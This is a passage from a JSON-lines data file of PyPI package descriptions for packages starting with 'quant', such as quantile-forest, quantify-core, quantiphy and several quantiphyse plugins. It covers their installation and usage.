"pacakge-description": "No description available on PyPI."} +{"package": "quantgo-cli", "pacakge-description": "To enable autocomplete feature type in console:export PATH=$PATH:~/src/qnet-cli/bin\ncomplete -C quantgo_complete quantgo"} +{"package": "quantgo-service-cli", "pacakge-description": "User Service CLI PythonInstallation:Install with pip into virtualenv or globally:pip install quantgo-service-cliTo enable autocomplete feature install cli tool and type in console:complete -C service_complete quantgo-serviceAPI client available:from qgservice import QuantGoServiceqg = QuantGoService()help(QuantGoService)"} +{"package": "quantgov", "pacakge-description": "BranchBuild StatusMasterDevThe QuantGov library is a companion to theQuantGov Platform. It provides an easy way to start a new project\nusing thequantgov startset of commands, and also provides a set of\nclasses and functions often used in the QuantGov framework.To install the library, usepip install quantgov.A tutorial of the library is available athttps://quantgov.github.io/quantgov-tutorial/pages/intro.html.How to ContributeCheck for open issues or open a fresh issue to start a discussion around a feature idea or a bug.Forkthe repositoryon GitHub to start making your changes to thedevbranch (or branch off of it).Write a test which shows that the bug was fixed or that the feature works as expected.Send a pull request and bug the maintainer until it gets merged and published. Make sure to add yourself toAUTHORS."} +{"package": "quanthub", "pacakge-description": "UNKNOWN"} +{"package": "quantificationlib", "pacakge-description": "QuantificationLibQuantificationLib is an open-source library for quantification learning.Installation and documentationThe installation, quick-start guide and documentation are availablehere."} +{"package": "quantifiedcode", "pacakge-description": "QCD"} +{"package": "quantifiles", "pacakge-description": "QuantifilesWelcome to Quantifiles, a PyQt5 application designed for viewing dataset files generated byQuantify-core. With Quantifiles, you can easily browse and visualize the contents of your data directory, including the ability to view a plot of the data and browse snapshots.InstallationInstall from PyPIpipinstallquantifilesInstall from sourceTo install Quantifiles from source, first clone the repository:gitclonehttps://gitlab.com/dcrielaard/quantifiles.gitcdquantifilesThen, install the application in a virtual environment using pip:pipinstall-e.Install with pipenvIf you prefer to use pipenv for managing your virtual environment, you can install Quantifiles with the following command:pipenvinstallgit+https://gitlab.com/dcrielaard/quantifiles.git#egg=quantifilesUsageYou can launch the application by running the following command in your terminal:quantifiles[--datadirDATADIR][--liveplotting][--loglevelLOGLEVEL]If you don't specify the data directory, you can still access it by selecting File->Open in the application.Alternatively, you can also use the executable file located in the Scripts folder, which will be generated upon installation.To start the application from within Python, run:fromquantifilesimportquantifilesquantifiles()# This will start the application, optionally you can pass the data directory as an argument.Tip:The plots can be copied to the clipboard by right-clicking on them.ContributingWe welcome contributions to Quantifiles! If you have an idea for a feature, or if you encounter a bug, pleaseopen an issueor submit a pull request.Feel free to dive in!LicenseThis project is licensed under the terms of the BSD 2-Clause License. See the LICENSE file for more details."} +{"package": "quantifin", "pacakge-description": "![example workflow](https://github.com/yueda27/quantifin/actions/workflows/CI_unittest.yml/badge.svg)"} +{"package": "quantify", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quantify-core", "pacakge-description": "quantify-coreQuantify is a Python-based data acquisition framework focused on Quantum Computing and\nsolid-state physics experiments.\nThe framework consists ofquantify-core(git|docs)\nandquantify-scheduler(git|docs).\nIt is built on top ofQCoDeSand is a spiritual successor ofPycQED.quantify-coreis the core module that contains all basic functionality to control experiments. This includes:A framework to control instruments.A data-acquisition loop.Data storage and analysis.Parameter monitoring and live visualization of experiments.Overview and CommunityFor a general overview of Quantify and connecting to its open-source community, seequantify-os.org.\nQuantify is maintained by the Quantify Consortium consisting of Qblox and Orange Quantum Systems.The software is free to use under the conditions specified in thelicense."} +{"package": "quantifymotion", "pacakge-description": "quantifymotion"} +{"package": "quantify-qblox", "pacakge-description": "Quantify QbloxQuantify Qblox is the Qblox hardware backend for Quantify, which is a Python-based data acquisition framework focused on Quantum Computing and solid-state physics experiments.The framework consists ofquantify-core(git|docs)\nandquantify-scheduler(git|docs).\nIt is built on top ofQCoDeSand is a spiritual successor ofPycQED."} +{"package": "quantify-scheduler", "pacakge-description": "quantify-schedulerQuantify is a Python-based data acquisition framework focused on Quantum Computing and\nsolid-state physics experiments.\nThe framework consists ofquantify-core(git|docs)\nandquantify-scheduler(git|docs).\nIt is built on top ofQCoDeSand is a spiritual successor ofPycQED.quantify-scheduleris a Python module for writing quantum programs featuring a hybrid gate-pulse control model with explicit timing control.\nThis control model allows quantum gate and pulse-level descriptions to be combined in a clearly defined and hardware-agnostic way.quantify-scheduleris designed to allow experimentalists to easily define complex experiments. It produces synchronized pulse schedules\nthat are distributed to control hardware, after compiling these schedules into control-hardware specific executable programs.Hardware/driver compatibilityQbloxquantify-schedulerqblox-instrumentsCluster firmwarev0.18.10.11.20.6.20.11.10.6.10.11.00.6.0v0.18.00.11.20.6.20.11.10.6.10.11.00.6.0v0.17.10.11.20.6.20.11.10.6.10.11.00.6.0v0.17.00.11.20.6.20.11.10.6.10.11.00.6.0v0.16.10.11.20.6.20.11.10.6.10.11.00.6.0v0.16.00.11.20.6.20.11.10.6.10.11.00.6.0v0.15.00.10.x0.5.00.9.00.4.0v0.14.00.10.x0.5.00.9.00.4.0v0.13.00.10.x0.5.00.9.00.4.0Zurich Instrumentszhinst==21.8.20515,zhinst-qcodes==0.1.4,zhinst-toolkit==0.1.5Overview and CommunityFor a general overview of Quantify and connecting to its open-source community, seequantify-os.org.\nQuantify is maintained by the Quantify Consortium consisting of Qblox and Orange Quantum Systems.The software is free to use under the conditions specified in thelicense."} +{"package": "quantifyspace", "pacakge-description": "quantifyspace"} +{"package": "quantile", "pacakge-description": "UNKNOWN"} +{"package": "quantile-data-kit", "pacakge-description": "Quantile Data Kit \ud83d\udd0dPublish to pypiHow to deploy a new version of the QDK?Update the package version insetup.py.Run the Makefilemake publishComponentsThere are four types of base components in the QDK.LoadComponent. Takes nothing as input and outputs a DataFrame.TransformComponent. Takes a DataFrame as input and outputs a DataFrame.TrainingComponent. Takes data and a model as input and outputs a trained model.InferenceComponent. Takes data and a model as input and ouputs prediction data.Adding a new component?Adding a new component to the QDK requires the following steps:Type of component:Decide which type of the four components above you are adding.Add component:Once you decide which type of component you are adding, add in the corresponding folder (e.g.qdk/loader) a new Python file that inherits from the parent component. In this file you can optionally overwriteinput_defs,output_defsandconfig_schema. When adding a new component, you are required to add a classmethod with the same name as thecompute_functionattribute on the parent class. The keys in theconfig_schemaare injected into the parameters of the compute function. Lastly, you need to import the new component toqdk/__init__.py. This allows you to import it from top-level.Write tests: To continuously check the robustness of the components, we highly encourage you to add tests usingpytest. The tests can be added atqdk/tests. Reminder to prefix the folder, files and functions withtest_. One is able to test the components using either VScode testing or the terminal (e.g. withpytest -s qdk/tests/test_loaders)."} +{"package": "quantile-estimator", "pacakge-description": "quantile-estimatorPython Implementation of Graham Cormode and S. Muthukrishnan's Effective Computation of Biased Quantiles over Data Streams in ICDE\u201905Installationpip install quantile-estimator==0.1.2This package can be found onPyPI."} +{"package": "quantile-forest", "pacakge-description": "quantile-forestquantile-forestoffers a Python implementation of quantile regression forests compatible with scikit-learn.Quantile regression forests (QRF) are a non-parametric, tree-based ensemble method for estimating conditional quantiles, with application to high-dimensional data and uncertainty estimation[1]. The estimators in this package are performant, Cython-optimized QRF implementations that extend the forest estimators available in scikit-learn to estimate conditional quantiles. The estimators can estimate arbitrary quantiles at prediction time without retraining and provide methods for out-of-bag estimation, calculating quantile ranks, and computing proximity counts. They are compatible with and can serve as drop-in replacements for the scikit-learn variants.Example of fitted model predictions and prediction intervals on California housing data (code)Quick StartInstall quantile-forest fromPyPIusingpip:pipinstallquantile-forestUsagefromquantile_forestimportRandomForestQuantileRegressorfromsklearnimportdatasetsX,y=datasets.fetch_california_housing(return_X_y=True)qrf=RandomForestQuantileRegressor()qrf.fit(X,y)y_pred=qrf.predict(X,quantiles=[0.025,0.5,0.975])DocumentationAn installation guide, API documentation, and examples can be found in thedocumentation.References[1]N. Meinshausen, \"Quantile Regression Forests\", Journal of Machine Learning Research, 7(Jun), 983-999, 2006.http://www.jmlr.org/papers/volume7/meinshausen06a/meinshausen06a.pdfCitationIf you use this package in academic work, please consider citinghttps://joss.theoj.org/papers/10.21105/joss.05976:@article{Johnson2024,doi={10.21105/joss.05976},url={https://doi.org/10.21105/joss.05976},year={2024},publisher={The Open Journal},volume={9},number={93},pages={5976},author={Reid A. Johnson},title={quantile-forest: A Python Package for Quantile Regression Forests},journal={Journal of Open Source Software}}"} +{"package": "quantile-ml", "pacakge-description": "No description available on PyPI."} +{"package": "quantile-python", "pacakge-description": "UNKNOWN"} +{"package": "quantile_regression_demo", "pacakge-description": "OVERVIEWMost of us are familiar with the charts that pediatricians use that show\npercentiles of weight and height as a function of age; generating such a chart\nfrom a small sample of data requires quantile regression or similar methods.\n(When working with a large enough sample of data, one can bin the data, i.e.,\ndivide the x-axis into intervals and calculate percentiles independently for\neach interval. But, this approach uses the data inefficiently and is unworkable\nwhen sample sizes are small).Quantiles and percentiles are the same except for a factor of 100, e.g., the\n30th percentile is the 0.3 quantile.This Python script demonstrates that one can perform quantile regression using\nonly Python, NumPy, and SciPy. The only other dependency is on matplotlib,\nwhich is used to plot the data and the quantile estimates.DETAILSIn detail, the script does the following:(1) Model parameters are assigned. (Currently, these are hardwired into the\ncode).(2) The program generates an artificial bivariate sample of data (x, y) as\nfollows:x is generated by drawing from a distribution that is uniform on [x_min, x_max], where x_min and x_max are currently 0 and 1, respectively.y is then generated according to a normal distribution having mean -0.5 + x and standard deviation 1.0 + 0.5 * x.(All of this can be changed, e.g., one could choose to make the mean of y quadratic in x).(3) The code defines an objective function based on the tilted absolute value\nfunction (see references for motivation).(4) The SciPy optimization package is then used to optimize (minimize) the\nobjective function.(5) Using the matplotlib module, the code plots a scatter diagram of the data\nwith an overlay of percentile lines."} +{"package": "quantile-scatter", "pacakge-description": "quantile_scatter\u4e0b\u306e\u65b9\u306b\u65e5\u672c\u8a9e\u306e\u8aac\u660e\u304c\u3042\u308a\u307e\u3059OverviewVisualization tool that makes it easier to get scatter plots right.The number of uniform data is divided into intervals on the x-axis, and the quantile points for each interval are displayed.Usageimportquantile_scatter# dummy datax_ls=[(4*random.random()-2)**3for_inrange(1000)]y_ls=[math.sin(x)+random.random()*0.5forxinx_ls]# plot [quantile_scatter]quantile_scatter.plot(x=x_ls,# x-listy=y_ls,# y-listmin_bin_ratio=1/20,# Ratio of the smallest group (the number of records in the smallest group as a percentage of the total)ile_ls=[0.25,0.5,0.75])Advanced UsageOption argument ofquantile_scatter.plot()function:mean=True# Also draw the \"mean\"show=False# Do not show the graph and only return the data to be displayed (useful for saving the graph or drawing with something other than matplotlib)missing_values=[None]# The specification that x contains a missing value of \"None\". Internally, the value is included in the statistics as \"missing\".\u6982\u8981\u6563\u5e03\u56f3\u3092\u6b63\u3057\u304f\u628a\u63e1\u3057\u3084\u3059\u304f\u3059\u308b\u53ef\u8996\u5316\u30c4\u30fc\u30eb\u5747\u4e00\u30c7\u30fc\u30bf\u6570\u306e\u6a2a\u8ef8\u533a\u9593\u306b\u5206\u3051\u3001\u5404\u533a\u9593\u306e\u5206\u4f4d\u70b9\u3092\u8868\u793a\u3059\u308b\u8aac\u660e\u306f\u57f7\u7b46\u4e2d\u3067\u3059\u4f7f\u7528\u4f8bimportquantile_scatter# \u30c0\u30df\u30fc\u30c7\u30fc\u30bfx_ls=[(4*random.random()-2)**3for_inrange(1000)]y_ls=[math.sin(x)+random.random()*0.5forxinx_ls]# \u5206\u4f4d\u70b9\u6563\u5e03\u56f3\u306e\u63cf\u753b [quantile_scatter]quantile_scatter.plot(x=x_ls,# \u6a2a\u8ef8\u6570\u5024\u30ea\u30b9\u30c8y=y_ls,# \u7e26\u8ef8\u6570\u5024\u30ea\u30b9\u30c8min_bin_ratio=1/20,# \u6700\u5c0f\u30b0\u30eb\u30fc\u30d7\u5272\u5408 (\u6700\u3082\u5c0f\u3055\u3044\u30b0\u30eb\u30fc\u30d7\u306e\u30ec\u30b3\u30fc\u30c9\u6570\u304c\u5168\u4f53\u306b\u5360\u3081\u308b\u5272\u5408)ile_ls=[0.25,0.5,0.75]# \u3069\u3053\u306e\u5206\u4f4d\u70b9\u3092\u51fa\u3059\u304b)\u767a\u5c55\u7684\u306a\u5229\u7528\u65b9\u6cd5quantile_scatter.plot()\u95a2\u6570\u306eoption\u5f15\u6570mean=True# \u300c\u5e73\u5747\u300d\u3082\u63cf\u753b\u3059\u308bshow=False# \u30b0\u30e9\u30d5\u8868\u793a\u305b\u305a\u3001\u8868\u793a\u5bfe\u8c61\u30c7\u30fc\u30bf\u306e\u307f\u3092\u8fd4\u5374 (\u30b0\u30e9\u30d5\u3092\u4fdd\u5b58\u3057\u305f\u3044\u5834\u5408\u3084\u3001matplotlib\u4ee5\u5916\u3067\u63cf\u753b\u3057\u305f\u3044\u5834\u5408\u306a\u3069\u306b\u6709\u52b9)missing_values=[None]# x\u306bNone\u3068\u3044\u3046\u6b20\u640d\u5024\u304c\u542b\u307e\u308c\u308b\u3068\u3044\u3046\u6307\u5b9a\u3002\u5185\u90e8\u7684\u306b\u306f\"missing\"\u3068\u3044\u3046\u5024\u3068\u3057\u3066\u96c6\u8a08\u306b\u542b\u3081\u3089\u308c\u308b\u3002"} +{"package": "quantile-transformer-tf", "pacakge-description": "[![Build Status](https://travis-ci.com/yandexdataschool/QuantileTransformerTF.svg?branch=master)](https://travis-ci.com/yandexdataschool/QuantileTransformerTF) [![DOI](https://zenodo.org/badge/156366202.svg)](https://zenodo.org/badge/latestdoi/156366202)# QuantileTransformerTF\nTensorflow implementation ofsklearn.preprocessing.QuantileTransformer. Transform only - please use the sklearn to fit.## InstallationThe releases are published on PyPi` pip install quantile_transformer_tf `To install from the source` python setup.py install `## Usage\nPlease see the docstrings andtest.pyPlease cite as [![DOI](https://zenodo.org/badge/156366202.svg)](https://zenodo.org/badge/latestdoi/156366202)"} +{"package": "quantimpy", "pacakge-description": "quantimpyWelcome to QuantImPy, a Python library for scientific image processing.This code performs morphological operations on Numpy arrays and can compute the\nMinkowski functionals and functions.This code is inspired by and partly based on theQuantIm\nlibraryC/C++ library for scientific\nimage processing.Documentation can be found onGithub.ioThis library is available onpypi.organd\ncan be installed using pip:pip install quantimpyIf you use this package in your research, please cite it as:Arnout M.P. Boelens, and Hamdi A. Tchelepi,QuantImPy: Minkowski functionals\nand functions with Python, SoftwareX, Volume 16, 2021, 100823, ISSN 2352-7110,\ndoi:10.1016/j.softx.2021.100823"} +{"package": "quantinuum-schemas", "pacakge-description": "Quantinuum schemasShared data models for Quantinuum.DependenciesWe try to keep the dependencies minimal.\nHowever we do needpydanticfor validation andpytketfor core (serialisable) models."} +{"package": "quant-invest-lab", "pacakge-description": "Quant Invest LabQuant Invest Labis a project aimed to provide a set of basic tools for quantitative experiments. By quantitative experiment I mean trying to build you own set of investments solution. The project is still in its early stage, but I hope it will grow in the future.Initially this project was aimed to be a set of tools for my own experiments, but I decided to make it open source. Of courses it already exists some awesome packages, more detailed, better suited for some use cases. But I hope it will be useful for someone else (learn, practice, understand and create). Feel free to use it, modify it and contribute to it. This package is basically the package I wanted to find when I started to learn quantitative finance.Main featuresData: download data from external data provider without restriction on candle stick, the main provider is kucoin for now (currently only crypto data are supported).Backtesting: backtest your trading strategy (Long only for now but soon short and leverage) on historical data for different timeframe. Optimize you take profit, stop loss. Access full metrics of your strategy.Indicators: a set of indicators to help you build your strategy.Portfolio: a set of portfolio optimization tools to help you build your portfolio.Simulation: simulate your data based on real data using statistics to get a better understanding of its behavior during backtesting.Metrics: a set of metrics to help you evaluate your strategy through performances and risks.InstallationTo installQuant Invest Labthrough pip, run the following command:pipinstallquant-invest-lab--upgradeYou can install it using poetry the same way :poetryaddquant-invest-labBasic examplesBacktest a basic EMA crossover strategyimportpandasaspdfromquant_invest_lab.backtestimportohlc_long_only_backtesterfromquant_invest_lab.data_providerimportdownload_crypto_historical_datasymbol=\"BTC-USDT\"timeframe=\"4hour\"df_BTC=download_crypto_historical_data(symbol,timeframe)# Define your indicatorsdf_BTC[\"EMA20\"]=df_BTC.Close.ewm(20).mean()df_BTC[\"EMA60\"]=df_BTC.Close.ewm(60).mean()df_BTC=df_BTC.dropna()# Define your strategy entry and exit functionsdefbuy_func(row:pd.Series,prev_row:pd.Series)->bool:returnTrueifrow.EMA20>row.EMA60elseFalsedefsell_func(row:pd.Series,prev_row:pd.Series,trading_days:int)->bool:returnTrueifrow.EMA20>>fromquantiphyimportQuantity>>>Tclk=Quantity(10e-9,'s')>>>print(Tclk)10ns>>>Fhy=Quantity('1420.405751786 MHz')>>>print(Fhy)1.4204GHz>>>Rsense=Quantity('1e-4\u03a9')>>>print(Rsense)100u\u03a9>>>cost=Quantity('$11_200_000')>>>print(cost)$11.2M>>>Tboil=Quantity('212 \u00b0F',scale='\u00b0C')>>>print(Tboil)100\u00b0COnce you have a quantity, there are a variety of ways of accessing aspects of\nthe quantity:>>>Tclk.real1e-08>>>float(Fhy)1420405751.786>>>2*cost22400000.0>>>Rsense.units'\u03a9'>>>str(Tboil)'100 \u00b0C'You can use therendermethod to flexibly convert the quantity to a string:>>>Tclk.render()'10 ns'>>>Tclk.render(show_units=False)'10n'>>>Tclk.render(form='eng',show_units=False)'10e-9'>>>Fhy.render(prec=8)'1.42040575 GHz'>>>Tboil.render(scale='\u00b0F')'212 \u00b0F'Thefixedmethod is a variant that specializes in rendering numbers without\nscale factors or exponents:>>>cost.fixed(prec=2,show_commas=True,strip_zeros=False)'$11,200,000.00'You can use the string format method or the new format strings to flexibly\nincorporate quantity values into strings:>>>f'{Fhy}''1.4204 GHz'>>>f'{Fhy:.6}''1.420406 GHz'>>>f'\u276c{Fhy:<15.6}\u276d''\u276c1.420406 GHz \u276d'>>>f'\u276c{Fhy:>15.6}\u276d''\u276c 1.420406 GHz\u276d'>>>f'{cost:#,.2P}''$11,200,000.00'>>>f'Boiling point of water:{Tboil:s}''Boiling point of water: 100 \u00b0C'>>>f'Boiling point of water:{Tboil:s\u00b0F}''Boiling point of water: 212 \u00b0F'QuantiPhyhas many more features and capabilities. For more information, view\nthedocumentation."} +{"package": "quantiphy-eval", "pacakge-description": "Author:Ken KundertVersion:0.5.0Released:2022-09-02A companion toQuantiPhy,quantiphy_evalevaluates strings containing simple algebraic expressions that involve\nquantities. It returns a quantity. For example:>>> from quantiphy_eval import evaluate\n\n>>> avg_price = evaluate('($1.2M + $1.3M)/2', '$')\n>>> print(avg_price)\n$1.25M\n\n>>> avg_freq = evaluate('(122.317MHz + 129.349MHz)/2', 'Hz')\n>>> print(avg_freq)\n125.83 MHzQuantiPhy Evalis used innetworthto allow you to give your estimated values using expressions that include\nnumbers that have units, SI scale factors, and commas. That allows you the\nconvenience of copy-and-pasting your numbers from websites without being forced\nto reformat them.WithQuantiPhythe units do not survive operations, so you can specify the\nresolved units using the second argument. In fact, the second argument is\npassed toQuantiPhyas themodel,\nwhich allows you to give the return value a name and description along with\nunits, as demonstrated in the next example.By defaultQuantiPhy Evalprovides no built-in constants.\nHowever, you can add your own constants:>>> from quantiphy import Quantity\n>>> from quantiphy_eval import evaluate, initialize\n>>> import math\n\n>>> my_constants = dict(\n... k = Quantity('k'),\n... q = Quantity('q'),\n... T = Quantity('25\u00b0C', scale='K'),\n... \u03c0 = Quantity(math.pi),\n... \u03c4 = Quantity(math.tau),\n... )\n>>> initialize(variables=my_constants)\n\n>>> Vt = evaluate('k*T/q', 'Vt V thermal voltage')\n>>> print(Vt.render(show_label='f'))\nVt = 25.693 mV \u2014 thermal voltageAlternatively, you can specify the model directly in the text passed toevaluate. Simply append it in the form of a double-quoted string:>>> Vt = evaluate('k*T/q \"Vt V thermal voltage\"')\n>>> print(Vt.render(show_label='f'))\nVt = 25.693 mV \u2014 thermal voltageYou can also useevaluateto assign values to names directly,QuantiPhy Evalremembers these values between calls toevaluate:>>> f_0 = evaluate('f\u2080 = 1MHz')\n>>> omega_0 = evaluate('\u03c9\u2080 = \u03c4*f\u2080 \"rads/s\"')\n>>> print(omega_0.render(show_label=True))\n\u03c9\u2080 = 6.2832 Mrads/sSimilarly,QuantiPhy Evalprovides no built-in functions by default, but you\ncan add any you need:>>> def median(*args):\n... args = sorted(args)\n... l = len(args)\n... m = l//2\n... if l % 2:\n... return args[m]\n... return (args[m] + args[m-1])/2\n\n>>> initialize(functions = dict(median=median))\n>>> median_price = evaluate('median($636122, $749151, $706781)', '$')\n>>> print(median_price.fixed(show_commas=True))\n$706,781initializetakes three arguments,variables,functionsandquantity.\nBothargumentsandfunctionstake dictionaries that overwrite any previously\nsaved values.quantitytakes aquantiphyQuantityclass. The return value\nofevaluatewill be an object of this class.rm_commasis a function for removing commas from an expression. This is used\nif your number contain commas. Simply stripping the commas it would prevent you\nfrom using multi-argument functions. However after removing the commasrm_commasalso converts semicolons to commas. So the previous example could\nbe rewritten as:>>> from quantiphy_eval import evaluate, rm_commas\n\n>>> median_price = evaluate(\n... rm_commas('median($636,122; $749,151; $706,781)'),\n... '$',\n... )\n>>> print(median_price.fixed(show_commas=True))\n$706,781QuantiPhy Evalsupports comments. A#and anything that follows it to the\nend of the line is ignored:>>> average_price = evaluate(\n... rm_commas('''\n... median(\n... $636,122 + # Zillow\n... $749,151 + # Redfin\n... $706,781 # Trulia\n... )/3\n... '''),\n... '$'\n... )\n>>> print(average_price.fixed(show_commas=True, prec=2, strip_zeros=False))\n$697,351.33Finally,QuantiPhy Evalusesinform.Errorfor error reporting:>>> from inform import Error\n\n>>> try:\n... Vt = evaluate('kT/q', 'V')\n... print(Vt)\n... except Error as e:\n... print(str(e))\nkT: variable unknown.ReleasesLatest development release:Version: 0.5.0Released: 2022-09-020.5 (2022-09-02):refactor the project structureprovideqeexample, a simple calculator0.4 (2021-01-27):Add ability to explicitly specify units (or model) in evaluated string.0.3 (2020-08-12):complete re-write, parser now implemented with ply rather than pyparsing.all built-in constants and functions have been removed.splitevaluateinto two:evaluateandinitialize.0.2 (2020-03-06):rm_commasnow converts semicolons to commassupport comments0.1 (2020-03-05):Add support for user-defined constants and functions.addrm_commasfunction.0.0 (2020-02-14):Initial version."} +{"package": "quantiphyse", "pacakge-description": "QuantiphyseViewer and data processing for 3D/4D medical imaging dataOverviewQuantiphyse provides tools for modelling and analysis of 3D/4D volumetric data, principally MRI data.Core features:Loading/Saving 3D/4D NIFTI filesAnalysis tools including single/multiple voxel analysis and data comparisonGeneric processing including smoothing, resampling, clusteringFeatures available via pluginsRegistration, motion correctionModelling tools for DCE, ASL, DSC and CEST MRIIntegration of selected FSL toolsSee:http://quantiphyse.readthedocs.org/en/latest/for full documentation.LicenseQuantiphyse is available free under an academic (non-commercial) license. See theLICENSEfile for\nfull details, and contactOUIif interested in\ncommercial licensing.InstallationSeehttps://quantiphyse.readthedocs.io/en/latest/basics/install.htmlfor current installation\ninstructionsRunning from source code (for developers)Running from source is recommended only if your are interested in developing the software further.Install the dependencies:The list of Python dependencies is inrequirements.txtFor example:pip install -r requirements.txtBuild extensionspython setup.py build_ext --inplaceRun from source directorypython qp.pyPackagingThe scripts packaging/build.py is used to build a frozen distribution package in the form of a compressed archive (tar.gzor.zip)\nand a platform-dependent package (deb,msiordpg). It should run autonomously, however you may need to input the sudo password\non Linux in order to build adebpackage.The--snapshotoption removes the version number from package filenames so you can provided them for download without having to change the link URLs.The--maxioption builds a package which includes selected plugins, assuming these are downloadedTo Do listIssue trackerCurrent issues can be viewed on the GitHub issue tracker (https://github.com/physimals/quantiphyse/issues)Roadmapv0.6 (Released June 2018)ASL tools first version (preprocess, model fit, calibration, multiphase)Improved viewer (full resolution, aligned)v0.8 (Target Mar 2019)Integration of selected FSL tools (FLIRT, FAST, BET, FSL_ANAT?) [x]Improved registration support (apply transform) [x]Improved ASL tools based on oxasl (inc. ENABLE, VEASL, DEBLUR) [x]Fabber T1 [x]Fabber DCE [x]DSC widget [x]Improvements to ROI builder - working 'paint' tool [x]Motion simulation [x]Add noise [x]v0.10 (Target 2020)Stable interface for QpWidget, QpData, Process [ ]Python 3 [x]Support PySide and PySide2 - ideally the latter by default [x]Improved manual data alignment tools [ ]Multi-overlay view [x]Perfusion simulator [x]Migration to PySide2Current version of Quantipihyse is targeted at Pyside2Shouldstill run under Pyside1 but not guaranteedCurrently using our own fork ofpyqtgraphawaiting official release with Pyside2 supportVague Plans for FutureMoCo/RegistrationBartek's MC method3D viewProbably not that useful but fun and may be easy(?) with vispy. Reliant on good refactoring of ImageViewApplication to surfaces (Tom K?)Use VisPy?Add Jola's texture analysis which sounds cool, whatever it isPK modelling validationQIBA [x]QINSimplify/rewrite generic Fabber interfaceImprove memory usage by swapping out data which are not being displayed?All widgets which process within ROI should work with the subimage within the bounding box of the\nROI, not the whole image.Supervoxels does this already with great performance improvement.Support other file formats using NIBABEL.DICOM conversion included where DCMSTACK is availableAdd semiquantitative measuresArea under the curveEnhancing fraction"} +{"package": "quantiphyse-asl", "pacakge-description": "ASL plugin for QuantiphyseThis plugin provides modelling tools for ASL-MRI.Quantiphyse and quantiphyse-fabber must be installed. To\ninstall the plugin from PyPi use:pip install quantiphyse-aslThe plugin will then be available from within Quantiphyse"} +{"package": "quantiphyse-cest", "pacakge-description": "CEST plugin for QuantiphyseThis plugin provides modelling tools for CEST-MRI using the\nFabber Bayesian model fitting tool.Quantiphyse and quantiphyse-fabber must be installed. To\ninstall the DCE plugin from PyPi use:pip install quantiphyse-cestThe plugin will then be available from within Quantiphyse"} +{"package": "quantiphyse-cvr", "pacakge-description": "CVR plugin for QuantiphyseThis plugin provides modelling tools for cerebrovascular reactivity\n(CVR) using BOLD-MRI with PETCO2Quantiphyse and quantiphyse-fabber must be installed. To\ninstall the plugin from PyPi use:pip install quantiphyse-cvrThe plugin will then be available from within Quantiphyse"} +{"package": "quantiphyse-datasim", "pacakge-description": "Data simulation plugin for QuantiphyseThis plugin provides data simulation tools.Quantiphyse and quantiphyse-fabber must be installed. To\ninstall the plugin from PyPi use:pip install quantiphyse-datasimThe plugin will then be available from within Quantiphyse"} +{"package": "quantiphyse-dce", "pacakge-description": "DCE plugin for QuantiphyseThis plugin provides modelling tools for DCE-MRI. Currently\ntwo implementations are provided - one based on the Tofts-Orton\nmodel and one using the Fabber Bayesian model fitting tool which\nsupports both measured and population AIFsQuantiphyse and quantiphyse-fabber must be installed. To\ninstall the DCE plugin from PyPi use:pip install quantiphyse-dceThe plugin will then be available from within Quantiphyse"} +{"package": "quantiphyse-deeds", "pacakge-description": "Quantiphyse plugin for the DEEDS registration methodDEEDS is a fully deformable registration method developed by Matthias Heinrich.\nFor more information on DEEDS and related projects see:http://www.mpheinrich.de/software.htmlThis plugin incorporates a version of the DEEDS code with the author's permission. See\nLICENSE for copyright information.ReferencesMRF-Based Deformable Registration and Ventilation Estimation of Lung CT.by Mattias P. Heinrich, M. Jenkinson, M. Brady and J.A. Schnabel IEEE Transactions on Medical Imaging 2013, Volume 32, Issue 7, July 2013, Pages 1239-1248http://dx.doi.org/10.1109/TMI.2013.2246577Multi-modal Multi-Atlas Segmentation using Discrete Optimisation and Self-Similaritiesby Mattias P. Heinrich, Oskar Maier and Heinz Handels VISCERAL Challenge@ ISBI, Pages 27-30 2015http://ceur-ws.org/Vol-1390/visceralISBI15-4.pdfMIND: Modality Independent Neighbourhood Descriptor for Multi-modal Deformable Registrationby MP Heinrich, M Jenkinson, M Bhushan, T Matin, F Gleeson, M Brady, JA Schnabel, Medical Image Analysis. vol. 16(7) 2012, pp. 1423-1435For Quantiphyse documentation see:https://quantiphyse.readthedocs.io/"} +{"package": "quantiphyse-dsc", "pacakge-description": "DSC plugin for QuantiphyseThis plugin provides modelling tools for DSC-MRI.Quantiphyse and quantiphyse-fabber must be installed. To\ninstall the plugin from PyPi use:pip install quantiphyse-dscThe plugin will then be available from within Quantiphyse"} +{"package": "quantiphyse-fabber", "pacakge-description": "Fabber plugin for QuantiphyseQuantiphyse is a visualisation and data analysis tool for volumetric\nmedical imaging data especially MRI. Seehttps://quantiphyse.orgfor more\ninformation.Fabber is a model fitting tool designed to fit nonlinear parameterised\nmodels to 4D fMRI data such as ASL, CEST, DCE, DSC, etc.To install, either use the setup script or:pip install quantiphyse-fabberThe plugin will then be available from within Quantiphyse"} +{"package": "quantiphyse-fsl", "pacakge-description": "FSL plugin for QuantiphyseThis plugin provides a Quantiphyse interface to selected FSL\ntools, currently:BETFASTFLIRT/MCFLIRT (via the registration widget)FSL_ANAT (experimental)Atlasses/standard dataQuantiphyse and FSL must be installed. Note that this plugin is\nan interface only and contains no FSL code itself!\nTo install the plugin from PyPi use:pip install quantiphyse-fslThe plugin will then be available from within Quantiphyse"} +{"package": "quantiphyse-qbold", "pacakge-description": "qBOLD plugin for QuantiphyseThis plugin provides modelling tools for qBOLD-MRI.Quantiphyse and quantiphyse-fabber must be installed. To\ninstall the plugin from PyPi use:pip install quantiphyse-qboldThe plugin will then be available from within Quantiphyse"} +{"package": "quantiphyse-sv", "pacakge-description": "Supervoxels plugin for QuantiphyseThis plugin provides supervoxels clustering method for QuantiphyseQuantiphyse must be installed. To install the plugin from PyPi use:pip install quantiphyse-svThe plugin will then be available from within Quantiphyse"} +{"package": "quantiphyse-t1", "pacakge-description": "T1 plugin for QuantiphyseThis plugin provides Bayesian modelling code for generating T1\nmaps from VFA MRI dataQuantiphyse and quantiphyse-fabber must be installed. To\ninstall the plugin from PyPi use:pip install quantiphyse-t1The plugin will then be available from within Quantiphyse"} +{"package": "quantiprot", "pacakge-description": "Quantiprotcurrent version: 0.2.5The Quantiprot package is a python package designed to facilitate quantitative analysis of protein sequences.The Quantiprot package is developed and maintained atPolitechnika Wroclawskawith financial support fromNational Science Centregrant no. 2015/17/D/ST6/04054 (Formal linguistics for proteomics - modeling, analysis and hypotheses testing).LicenseThe Quantiprot package is distributed underthe MIT license.CitingIf you publish results obtained using Quantiprot, please cite:B.M. Konopka, M. Marciniak, and W. Dyrka. Quantiprot \u2013 a Python package for quantitative 